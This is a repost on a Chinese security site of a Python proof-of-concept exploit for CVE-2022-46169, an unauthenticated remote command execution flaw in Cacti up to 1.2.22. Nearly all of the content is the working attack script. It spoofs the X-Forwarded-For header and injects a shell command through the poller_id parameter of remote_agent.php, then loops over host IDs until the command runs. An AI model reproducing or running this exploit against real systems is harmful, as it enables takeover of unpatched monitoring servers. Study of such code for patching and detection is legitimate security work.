CVE-2022-46169 的 PoC - Cacti <= 1.2.22 上未经身份验证的 RCE

admin 2023年2月3日11:30:54评论79 views字数 1649阅读5分29秒阅读模式
positional arguments:  target                URL of the Cacti application.
optional arguments: -f FILE File containing the command -c CMD Command --n_host_ids The range of host_ids to try (0 - n) --n_local_data_ids The range of local_data_ids to try (0 - n)
import requestsimport argparse
parser = argparse.ArgumentParser( prog='Poc for CVE-2022-46169', description='Exploit Unauthenticated RCE on Cacti <= 1.2.22', epilog='Author: saspect')
parser.add_argument('target', help='URL of the Cacti application.')

group = parser.add_mutually_exclusive_group(required=True)group.add_argument('-f', type=argparse.FileType(), help='File containing the command', dest='file')group.add_argument('-c', help='Command', dest='cmd')
parser.add_argument( '--n_host_ids', help='The range of host_ids to try (0 - n)', default=100, dest='n_ids', type=int)
parser.add_argument( '--n_local_data_ids', help='The range of local_data_ids to try (0 - n)', default=50, dest='n_localids', type=int)

args = parser.parse_args()
if args.file: # The '-f' argument is supplied, read the command from the file cmd = args.file.read().strip()elif args.cmd: # The '-c' argument is supplied, use it as the command cmd = args.cmdelse: # No command was supplied, print an error message parser.print_help() exit(1)

payload = f'; /bin/sh -c "{cmd}"'
local_data_ids = [x for x in range(0, args.n_localids)]target_ip = args.target.split("/")[2]
print(f"[*] Trying for 1 - {args.n_ids} host ids")

for id in range(args.n_ids): url = f'{args.target}/remote_agent.php' params = {'action': 'polldata', 'host_id': id, 'poller_id': payload, 'local_data_ids[]': local_data_ids} headers = {'X-Forwarded-For': target_ip}
r = requests.get(url, params=params, headers=headers) if('cmd.php' in r.text): print(f"[+] Exploit Completed for host_id = {id}") break


CVE-2022-46169 的 PoC - Cacti <= 1.2.22 上未经身份验证的 RCE


原文始发于微信公众号(Khan安全攻防实验室):CVE-2022-46169 的 PoC - Cacti <= 1.2.22 上未经身份验证的 RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月3日11:30:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-46169 的 PoC - Cacti <= 1.2.22 上未经身份验证的 RCEhttps://cn-sec.com/archives/1534922.html

发表评论

匿名网友 填写信息